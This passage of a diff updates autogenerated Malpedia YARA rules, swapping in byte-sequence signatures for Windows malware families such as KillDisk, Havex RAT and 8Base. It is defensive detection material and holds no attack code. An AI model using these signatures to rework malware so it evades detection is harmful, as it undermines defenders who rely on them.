+		$sequence_13 = { c70609000000 c7471870b30210 8b4508 894620 8b450c 89461c 8b45fc }
+		$sequence_14 = { ff75e8 8bf8 e8???????? 59 ff75fc ff15???????? }
+		$sequence_15 = { 03c0 894340 8b7340 418bc4 }
+		$sequence_16 = { ff15???????? 8b45f0 0500a30200 50 e8???????? 3bfb 59 }
+		$sequence_17 = { 6af9 2b5510 8b4d14 58 8911 5f 5e }
+		$sequence_18 = { 01442454 03d1 294c2450 8b4c2410 }
+		$sequence_19 = { 6a04 50 8d45d0 6a04 50 8d85d0feffff 50 }
+		$sequence_20 = { 837dfc02 0f877b010000 c1e802 8d4c40fd }
+		$sequence_21 = { 48 8bce 49 8d4002 48 }
+		$sequence_22 = { 03c6 85c0 7f09 488b0a 488b01 ff5008 488b4b28 }
+		$sequence_23 = { 6a14 50 c745e01d3b395c c745e4aeacefc4 c745e885230f62 c745ec45a5940f }
+		$sequence_24 = { 7411 8b5204 85d2 740a 833900 7405 833a00 }
+		$sequence_25 = { 013e 33c0 8b16 83c410 }
+		$sequence_26 = { 03c6 4863d0 4c8d0c12 4c8d4718 }
+		$sequence_27 = { 01460c 488b3f 493bfc 0f8554ffffff }
+		$sequence_28 = { 012e 33c0 5f 5e 5d }
+		$sequence_29 = { c70309000000 c746183cb40210 ebc9 8b450c 894720 }
 
 	condition:
-		7 of them and filesize < 811008
+		7 of them and filesize < 377856
 }
-rule MALPEDIA_Win_Sierras_Auto : FILE
+rule MALPEDIA_Win_Bamital_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70c5a6f9-c2e5-57b1-90d8-8b9060fdf637"
+		id = "9e41d3b4-c83b-5900-9fce-309a5ed93679"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sierras_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bamital_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "c05b0e9c28fed253d00c96c986fab4dbaf0e644651c700ec0227f1b00097c981"
+		logic_hash = "5e66490a96474a739f708c54bb1198a62bba1cb62437d954f80417ba9cecdcf4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124275,38 +124521,32 @@ rule MALPEDIA_Win_Sierras_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8698010000 5e c3 56 8bf1 }
-		$sequence_1 = { f3ab 8bce aa e8???????? }
-		$sequence_2 = { 33d2 eb19 8b0d???????? 2bc8 }
-		$sequence_3 = { 56 8bf1 e8???????? 8d8614010000 5e c3 }
-		$sequence_4 = { c705????????01000000 a3???????? a3???????? ff15???????? 85c0 }
-		$sequence_5 = { 33c0 5b 81c474010000 c21000 56 68???????? }
-		$sequence_6 = { 397d08 897dfc 0f8cc0000000 837d0801 7e58 837d0803 0f8fb0000000 }
-		$sequence_7 = { 8bfa 83c9ff 33c0 8d9c2498000000 }
-		$sequence_8 = { 83c302 f3a5 8bc8 83e103 f3a4 8bbc2410040000 }
-		$sequence_9 = { 51 e8???????? 83c40c 8d542400 6a01 6a00 52 }
-		$sequence_10 = { f3a4 8b0d???????? 8b15???????? 2bd1 b8abaaaa2a }
-		$sequence_11 = { e8???????? 6a00 56 ff7514 8d4de0 e8???????? 0175f0 }
-		$sequence_12 = { 8d1440 a1???????? c1e205 03d6 }
-		$sequence_13 = { 8b450c 7511 8b4dec 03c7 }
-		$sequence_14 = { 83e103 f3a4 ffd3 50 68???????? }
-		$sequence_15 = { 837d0803 0f8fb0000000 397d10 897df0 0f86a4000000 8b7d14 }
+		$sequence_0 = { 6800040000 e8???????? 8045f301 ff45fc }
+		$sequence_1 = { 803820 7516 83c101 83f901 7504 8bd0 }
+		$sequence_2 = { 2c1f b47e 02e0 80ec19 }
+		$sequence_3 = { ff75f8 ff7508 e8???????? e8???????? 8b7dfc }
+		$sequence_4 = { 52 8b5508 b800000000 803a00 7408 }
+		$sequence_5 = { 837dd800 7505 e9???????? 837df000 }
+		$sequence_6 = { 8945f8 8b4df8 2b4d08 51 }
+		$sequence_7 = { 8bec 56 50 8b550c 8b7508 }
+		$sequence_8 = { 8bd0 eb0a 83f904 7505 c60000 eb05 83c001 }
+		$sequence_9 = { 83f901 7504 8bd0 eb0a 83f904 7505 c60000 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Open_Carrot_Auto : FILE
+rule MALPEDIA_Win_Unidentified_092_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f072a642-4447-5973-9ead-dc9232cd5b85"
+		id = "a832d924-1526-5b98-85cb-a6a677c2763a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.open_carrot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_092_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "28ad822413b17834bf69734ab09ffa4d02ddba5c7af7590650f7bb3e1133ed6c"
+		logic_hash = "652402e87963cd0c6ff5366fe9ef518c3ad3cc147775da4e4b2ee294d04144ab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124320,32 +124560,32 @@ rule MALPEDIA_Win_Open_Carrot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83bb90af010000 8b0f 7430 488b93a0af0100 4c8bc7 488b0b ff5318 }
-		$sequence_1 = { 4d8b2424 4c21e6 4c01f7 4881e104000000 4889e8 48056f000000 4c01c1 }
-		$sequence_2 = { 488bc8 e8???????? 488bf8 4885c0 7533 4c8d0d3b5d0600 c7442420c7000000 }
-		$sequence_3 = { ff15???????? 807da02d 7518 807da12d 7512 e8???????? 84c0 }
-		$sequence_4 = { 412b5500 4d89d8 4889f6 482580000000 81ea027cee51 4981c840000000 48253f000000 }
-		$sequence_5 = { 8133eaa23d55 4889eb 49c7c500000000 4881c36f000000 48c7c000020000 66290b 4981c3ffff0000 }
-		$sequence_6 = { 7525 4c8d0d92101000 c744242096010000 ba9d000000 8d4822 448d4041 e8???????? }
-		$sequence_7 = { 488bd8 4885c0 7520 4c8d0da8081000 c7442420dc000000 ba8d000000 448d400d }
-		$sequence_8 = { 896808 4889680c e8???????? 33d2 4889430c 41b804010000 488bc8 }
-		$sequence_9 = { e8???????? 85c0 0f8551010000 488d4db3 e8???????? 85c0 0f852b010000 }
+		$sequence_0 = { 8955fc 3bc8 7313 8bcf 89471c e8???????? 8bc7 }
+		$sequence_1 = { 8bcf e8???????? 83c404 6a02 6a00 53 }
+		$sequence_2 = { 03d6 23cb 8bf0 894d08 8bcf 234df4 094d08 }
+		$sequence_3 = { e8???????? 8bd7 8bc8 e8???????? 8b45e8 83f808 720d }
+		$sequence_4 = { 6a00 6a01 8d45eb c645eb29 50 57 }
+		$sequence_5 = { 0f4345d4 6800040000 50 ff75b4 ff15???????? c645fc00 8b45d0 }
+		$sequence_6 = { 33d1 8b4d08 8bf9 03d6 23cb 0bfb 237de4 }
+		$sequence_7 = { 3d00100000 722a f6c11f 0f8500050000 8b41fc 3bc1 0f83f5040000 }
+		$sequence_8 = { e8???????? 84c0 7439 68???????? 8d8d80f6ffff e8???????? 8d8d64f6ffff }
+		$sequence_9 = { c745cc00000000 c645bc00 e8???????? c645fc01 81ff00040000 7d21 be00040000 }
 
 	condition:
-		7 of them and filesize < 8377344
+		7 of them and filesize < 10202112
 }
-rule MALPEDIA_Win_Andromut_Auto : FILE
+rule MALPEDIA_Win_Ldr4_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01d6866f-94d6-5040-b42e-5414ac7b6d42"
+		id = "e9bf8314-609f-5a98-b31a-45503c13f904"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.andromut_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ldr4_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "439db6ddaec21c0c7cf9cb5dec8606d00b8cbca3475fe9c3377e8acfff026f82"
+		logic_hash = "53ff90205c01818bf39f4f2440172f0cbaed0a0fe830aff04c528ba3bd5f6dab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124359,32 +124599,32 @@ rule MALPEDIA_Win_Andromut_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7204 8b0e eb02 8bce 807c01fe3d 7501 4a }
-		$sequence_1 = { 8bf9 897de4 33db 895dfc 68???????? 895dec e8???????? }
-		$sequence_2 = { 03c2 83f037 f7d0 83f03b 8bc8 c1e004 c1e904 }
-		$sequence_3 = { 8bc1 c1e106 c1e80a 83e03f 0bc1 }
-		$sequence_4 = { 3dc8000000 756c 33f6 8d8dc8f3ffff }
-		$sequence_5 = { 50 8d85b8ebffff 50 8d8d40e3ffff e8???????? 83bd54e3ffff10 8db540e3ffff }
-		$sequence_6 = { 83c202 663bc6 75f5 2bd1 d1fa 52 56 }
-		$sequence_7 = { 8bd0 8d4d90 e8???????? 85ff 7e52 897d84 8b7d88 }
-		$sequence_8 = { 0fb6c0 0f45c8 3255ff 324dfd 324df4 880e 8aca }
-		$sequence_9 = { b9daf68a50 ab 66ab e8???????? 56 6880000000 }
+		$sequence_0 = { 85c0 7407 50 ff15???????? 53 55 57 }
+		$sequence_1 = { e8???????? 8bfb 85db 0f855d020000 8d44242c 50 e8???????? }
+		$sequence_2 = { 8b7368 57 85f6 7437 83c350 }
+		$sequence_3 = { a1???????? 8b4008 53 56 8b35???????? 57 6a11 }
+		$sequence_4 = { 57 33c0 e8???????? 894508 83c324 83c8ff f00fc103 }
+		$sequence_5 = { 83c40c ff75f4 ffd3 8b4674 3945fc 7203 8945fc }
+		$sequence_6 = { 0bf2 687caaf6db 8b450c 8b4810 e8???????? 85c0 }
+		$sequence_7 = { 683799f0e7 c74514a00a0000 e8???????? 3bc7 740d 6a04 8d4d14 }
+		$sequence_8 = { 57 8bce e8???????? 85c0 750a 8b4e28 8b5510 }
+		$sequence_9 = { 50 ff75f8 e8???????? ff75f8 894508 6a00 56 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 117760
 }
-rule MALPEDIA_Win_Playwork_Auto : FILE
+rule MALPEDIA_Win_8Base_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "04893cf6-e630-529b-badc-29b196733e23"
+		id = "75838edc-73a2-5e39-b8ec-96e50d44170a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.playwork_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.8base_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "7105c3ff4bb7347e4c96600c56543cdd3a8eee25d86105d64120af9ee3e9d2c3"
+		logic_hash = "928a212ebdb041c9575d16d9def4153d3085b06453acab4557e4b175f3e06eda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124398,34 +124638,34 @@ rule MALPEDIA_Win_Playwork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 50 897510 ff7308 }
-		$sequence_1 = { 8975e0 8b75f0 8b0c8d344f3f00 c1ee18 330cb534573f00 330c9534533f00 8b55f4 }
-		$sequence_2 = { eb02 33c0 c1e008 0bc6 8a9f5c8e3f00 c1e008 0bc6 }
-		$sequence_3 = { ffd6 80a56cfeffff00 6a1f 59 33c0 8dbd6dfeffff 6880000000 }
-		$sequence_4 = { 85c0 7520 ff75fc 8b35???????? ffd6 ff7508 ffd6 }
-		$sequence_5 = { c1ca08 8bda 8bc2 c1eb10 c1e818 0fb6db }
-		$sequence_6 = { 33c0 c1e008 0bc5 c1e008 0b442410 }
-		$sequence_7 = { ff75f4 ff15???????? ff75f0 eb01 57 ff15???????? }
-		$sequence_8 = { 53 53 68???????? ff75fc ffd6 85c0 5f }
-		$sequence_9 = { 81c41c640000 c3 55 8bec 81ecb8030000 53 56 }
+		$sequence_0 = { ffd6 8d8c2420010000 51 ffd7 8d942440110000 }
+		$sequence_1 = { f8 290c67 98 a6 73c2 }
+		$sequence_2 = { 68ff000000 e8???????? 59 59 8b7508 8d34f588b34200 391e }
+		$sequence_3 = { 75b9 e8???????? a1???????? a3???????? ffd0 }
+		$sequence_4 = { c684249c00000002 50 c7442410043a4000 e8???????? }
+		$sequence_5 = { d3ea 89542414 8b442434 01442414 8b442424 31442410 }
+		$sequence_6 = { ff15???????? 8b442414 40 3d???????? 89442414 0f8c0effffff 8b35???????? }
+		$sequence_7 = { 894c2438 89542434 e8???????? a1???????? 814424283f020000 }
+		$sequence_8 = { 6689442416 33c9 668954241a 8d442434 50 66894c241c 8b4c241c }
+		$sequence_9 = { 899c24ac000000 3bfb 7449 8b8424b8000000 56 8d742418 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 10838016
 }
-rule MALPEDIA_Win_Collection_Rat_Auto : FILE
+rule MALPEDIA_Win_Redsalt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1b2d65a3-063f-5da2-afcb-bd2cf7ccde3f"
+		id = "5db28da0-c495-5a5e-81dd-226433bd91b1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.collection_rat_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redsalt_auto.yar#L1-L223"
 		license_url = "N/A"
-		logic_hash = "a7a889a1cf63b732a0e6294d85395ab72d5994c8a4737c39e94d8d81761fea64"
+		logic_hash = "5cb648a823e719ff50550ad2518a39d179f56511a84a79bfd6218be12b96b8b0"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -124437,32 +124677,47 @@ rule MALPEDIA_Win_Collection_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 448928 498b4f10 4885c9 7405 e8???????? }
-		$sequence_1 = { 4c8bc0 4889442450 eb05 4c8b442450 }
-		$sequence_2 = { 488b05???????? 488b4808 488b4930 4883c110 e8???????? 488b05???????? }
-		$sequence_3 = { e8???????? 4883c604 448bc7 488bd6 488bc8 488bd8 }
-		$sequence_4 = { 85c0 7461 e9???????? 488b9540070000 4c8d0590980000 }
-		$sequence_5 = { 84c0 740a 458b949be4350200 eb08 458b949bac350200 448d47ff }
-		$sequence_6 = { 488913 498bfe 895308 4d3bf4 0f8364010000 448a2f 4c8d35843b0100 }
-		$sequence_7 = { 41b806000000 488d15d7390100 483950f0 740b 488b10 4885d2 7403 }
-		$sequence_8 = { 89442420 4c8b8c2480110000 4533c0 8bd3 8d4fe9 e8???????? }
-		$sequence_9 = { 488bc8 bac8000000 e8???????? 488bd0 41b810000000 488bcb 4883c420 }
+		$sequence_0 = { 83c414 33c9 83f8ff 0f95c1 }
+		$sequence_1 = { 750b 68e8030000 ff15???????? e8???????? }
+		$sequence_2 = { c745d060ea0000 6a04 8d45d0 50 6806100000 68ffff0000 }
+		$sequence_3 = { e8???????? 85c0 750a 6a32 }
+		$sequence_4 = { 51 ffd6 85c0 7510 }
+		$sequence_5 = { 85c0 7515 c705????????01000000 ff15???????? e9???????? }
+		$sequence_6 = { 740d 68???????? e8???????? 83c404 833d????????02 }
+		$sequence_7 = { 83c9ff 85f6 7c0e 83fe7f }
+		$sequence_8 = { 7509 80780120 7503 83c002 }
+		$sequence_9 = { 6a00 52 c744242401000000 8944242c }
+		$sequence_10 = { 8d8530fcffff 50 e8???????? 83c40c }
+		$sequence_11 = { c60100 5f 5e 33c0 }
+		$sequence_12 = { 83c40c eb02 33c0 8b4df4 }
+		$sequence_13 = { e8???????? 83c408 6800010000 68???????? }
+		$sequence_14 = { 833800 750f c705????????01000000 e9???????? }
+		$sequence_15 = { f7e7 8bea d1ed 33c0 }
+		$sequence_16 = { d1ed 33c0 83ef03 8a06 83c603 c1e802 41 }
+		$sequence_17 = { eb03 83caff 8b442410 c0e106 0aca 884d00 45 }
+		$sequence_18 = { c644243423 c644243572 c64424367a c644243700 }
+		$sequence_19 = { c8201cdd f7be5b408d58 1b7f01 d2cc }
+		$sequence_20 = { d2cc bbe3b46b7e 6aa2 dd45ff }
+		$sequence_21 = { e8???????? 89442430 48c744244000000000 8b442430 }
+		$sequence_22 = { e8???????? 89442428 e9???????? bf2d000000 488d542420 4d8bc5 }
+		$sequence_23 = { e8???????? 8944242c 8b4c2428 8b44242c }
+		$sequence_24 = { e8???????? 89442428 e9???????? 8b4c2420 8b442428 01c8 }
 
 	condition:
-		7 of them and filesize < 397312
+		7 of them and filesize < 2957312
 }
-rule MALPEDIA_Win_Atmitch_Auto : FILE
+rule MALPEDIA_Win_Killdisk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "72b8ffe7-fc9a-5d92-9de1-9193b095fc04"
+		id = "d7be3786-7785-5fb7-a02c-f300fdd3ab5d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmitch_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.killdisk_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "e051c844a76319030fd5ab69ee7c6a522b22df21eb94d4b042bb698655f157ac"
+		logic_hash = "86f639bc00ee029db28c18aca620f57e9d7c8d6a5978a5c4489b1ba8c9e4159d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124476,32 +124731,38 @@ rule MALPEDIA_Win_Atmitch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c644244803 ff15???????? 8d4c2418 51 68???????? }
-		$sequence_1 = { 83c408 50 ff15???????? 56 51 8bcc }
-		$sequence_2 = { 8bfe f7df 896c241c 0fb744242c 50 51 }
-		$sequence_3 = { 51 833d????????00 7422 a1???????? 50 }
-		$sequence_4 = { 6a0d 8d4c240c ff15???????? 6a0a 8d4c240c ff15???????? 6a0a }
-		$sequence_5 = { 0bc8 51 e8???????? 0fb74e07 83c404 8bd8 }
-		$sequence_6 = { 8bcc 89642410 68???????? ff15???????? e8???????? 0fb705???????? 83c408 }
-		$sequence_7 = { ff15???????? 83bc24fc00000000 7432 8b4c2408 8b41f4 }
-		$sequence_8 = { c644244803 ff15???????? 8d4c2418 51 68???????? 8d542428 52 }
-		$sequence_9 = { 83c404 50 ff15???????? 50 51 }
+		$sequence_0 = { 3bf3 8bd6 741c 2bee 57 8bff }
+		$sequence_1 = { 881438 e8???????? 9c c6442408cf }
+		$sequence_2 = { 0f89bc010000 60 9c 8f44241c c64424148e c644240426 e8???????? }
+		$sequence_3 = { e8???????? 9c 8f442420 ff3424 ff742424 8f4500 9c }
+		$sequence_4 = { 8b8c24d41a0000 5f 5e 5b }
+		$sequence_5 = { 83c10f 836c242001 894c2410 0f85f8feffff 8b6c2428 }
+		$sequence_6 = { 8be5 5d c20400 8b4804 8b30 }
+		$sequence_7 = { ff15???????? 3c05 0f85f8010000 b9???????? e8???????? }
+		$sequence_8 = { e9???????? ff742404 66894500 886c2408 9c }
+		$sequence_9 = { 50 51 e8???????? 4e 80fcd7 }
+		$sequence_10 = { ff15???????? e9???????? 83f810 0f8461ffffff 3d01010000 }
+		$sequence_11 = { 5e e8???????? 66ffc6 e8???????? }
+		$sequence_12 = { 50 8d642434 e9???????? 660fbcc3 660fa5e0 8b4500 }
+		$sequence_13 = { c604243a 9c 8d642434 e9???????? 883424 }
+		$sequence_14 = { 85f6 74f6 8bfe e8???????? 8b4314 }
+		$sequence_15 = { 33c0 89442404 89442408 8944240c 8d442408 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 10817536
 }
-rule MALPEDIA_Win_Chthonic_Auto : FILE
+rule MALPEDIA_Win_Crackedcantil_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "88bbe6d9-2022-5fe0-b1f7-f4f3c2df3385"
+		id = "52d95e2e-99ba-5a33-908a-7559ea7385c4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chthonic_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crackedcantil"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crackedcantil_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "da867e1af67cf97ccf35b53e1588f870d915e4ed4b4f2f84ed6de90f903a9195"
+		logic_hash = "17b1a73eb9ece6311db723bfa77f75998ebf06320351a537998796263eeb6f3a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124515,32 +124776,32 @@ rule MALPEDIA_Win_Chthonic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b10 8911 0fb64dff 46 }
-		$sequence_1 = { 6a04 56 8d4604 68fc0f0000 }
-		$sequence_2 = { 81e1ff00ff00 0bc1 89470c 5f }
-		$sequence_3 = { 32cb 80e17f 8808 b001 5b c3 }
-		$sequence_4 = { 8911 8b00 8b4d08 03c2 25ff000080 7907 48 }
-		$sequence_5 = { ff751c ff7518 ff7514 53 ff7510 ff7508 e8???????? }
-		$sequence_6 = { b8ecff0000 660145f0 8d45f0 50 56 e8???????? }
-		$sequence_7 = { 4e 81ce00ffffff 46 8d84b5fcfbffff 8b08 03f9 81e7ff000080 }
-		$sequence_8 = { 83e601 eb00 85f6 74cf 8345fc02 b9000d0000 }
-		$sequence_9 = { c1c108 81e1ff00ff00 0bc1 89470c }
+		$sequence_0 = { ff3424 5b 4881ec08000000 48891424 4889e2 4883c208 4881c208000000 }
+		$sequence_1 = { eb7e 488b842490000000 0f57c0 f20f1100 eb6d 488b842490000000 48c70000000000 }
+		$sequence_2 = { f30f7f00 488b8424f0060000 48898424f00a0000 488b9424f00a0000 488b8c24c8000000 e8???????? 488905???????? }
+		$sequence_3 = { f3aa 488d8424c0430000 48898424f0130000 488d152df22c00 488b8c24f0130000 e8???????? 48898424f8130000 }
+		$sequence_4 = { ffc0 488b4c2440 8901 b801000000 eb15 48837c244800 740b }
+		$sequence_5 = { e8???????? 4889442470 c744244000000000 eb0a 8b442440 ffc0 89442440 }
+		$sequence_6 = { f3a4 488d542450 488b8c2480000000 e8???????? 90 488b842480000000 4883c468 }
+		$sequence_7 = { ff742410 ff3424 ff3424 5b 4881c408000000 4881c408000000 688fdfbf7d }
+		$sequence_8 = { e8???????? 90 488d8c24b0130000 e8???????? 90 488d8c24d0130000 e8???????? }
+		$sequence_9 = { f3aa 488d05e9923200 4889842450040000 488b842450040000 488bc8 e8???????? 488d05ca923200 }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 37863424
 }
-rule MALPEDIA_Win_Expiro_Auto : FILE
+rule MALPEDIA_Win_Havex_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "537fff19-bacc-5fad-8e62-d15e873151bb"
+		id = "62ba2091-3094-511c-928f-d8587303cab0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.expiro_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.havex_rat_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "9d4a4b6071f8efe24f30549b3b2d217f52995878f6039fe924a8169a6f93625b"
+		logic_hash = "051d7a160bda27ce92537b0acc638ab1e006b209a8b64890cf910d9cca719a54"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124554,32 +124815,32 @@ rule MALPEDIA_Win_Expiro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b550c 8b349a b9???????? 8bc6 8da42400000000 668b10 663b11 }
-		$sequence_1 = { 83c404 803d????????00 0f8543010000 68???????? e8???????? 83c404 8d8424e4020000 }
-		$sequence_2 = { 8d442414 50 56 33c0 897c241c }
-		$sequence_3 = { c78424d400000007000000 899c24d0000000 e8???????? 6a08 b8???????? 8d8c24c0000000 }
-		$sequence_4 = { 837e1408 722a 8b06 eb28 85ed 75f2 896e10 }
-		$sequence_5 = { 52 e8???????? 85c0 752b 68???????? eb29 68???????? }
-		$sequence_6 = { 7407 50 ff15???????? 8ac3 e9???????? 57 ff15???????? }
-		$sequence_7 = { 75f5 2bc2 d1f8 50 8d442458 8d742420 e8???????? }
-		$sequence_8 = { c744242c07000000 897c2428 6689542418 8d7102 668b11 83c102 663bd7 }
-		$sequence_9 = { 83c404 33c0 668944244c 6a04 897c2464 895c2460 e8???????? }
+		$sequence_0 = { ff4dc8 8d4701 8906 83ee04 837dc800 7dcd }
+		$sequence_1 = { e8???????? 33ff 895dfc 47 68???????? 8d8d6cffffff }
+		$sequence_2 = { c74128e41b0510 c7413c901b0510 e8???????? 5e c3 8d4e28 c706???????? }
+		$sequence_3 = { ff750c ff7508 50 8b4510 e8???????? 83c414 c9 }
+		$sequence_4 = { ff4dd8 8945ec 8b4dec c7430428000000 eb37 8b03 83780400 }
+		$sequence_5 = { 68???????? 8d8da8f7ffff e8???????? c645fc03 eb98 8d85c4f7ffff }
+		$sequence_6 = { 83c040 50 e8???????? 83c414 8b8d84010000 5f 33cd }
+		$sequence_7 = { 56 8bf0 837e1808 57 7205 8b4604 eb03 }
+		$sequence_8 = { 039798c90000 8b7ddc 0fb77c7b3c 897de0 81c7990c0000 c1e704 030437 }
+		$sequence_9 = { ffd6 83f801 74f3 6a01 ffd5 53 }
 
 	condition:
-		7 of them and filesize < 3776512
+		7 of them and filesize < 892928
 }
-rule MALPEDIA_Win_Ssload_Auto : FILE
+rule MALPEDIA_Win_Netspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f6ceb229-a7e1-5841-bcaa-d6789358d285"
+		id = "d080908e-0a12-5fdc-839c-5d0458a92f12"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ssload"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ssload_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netspy_auto.yar#L1-L100"
 		license_url = "N/A"
-		logic_hash = "816793f1c924d2fa45e62fdcb0930a6aeafd4fdc18acca20a05a5227b74cb23d"
+		logic_hash = "66a516dd000926156bcdfd45ff83678e3971de0f2826970552469344651d0e0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124593,38 +124854,30 @@ rule MALPEDIA_Win_Ssload_Auto : FILE
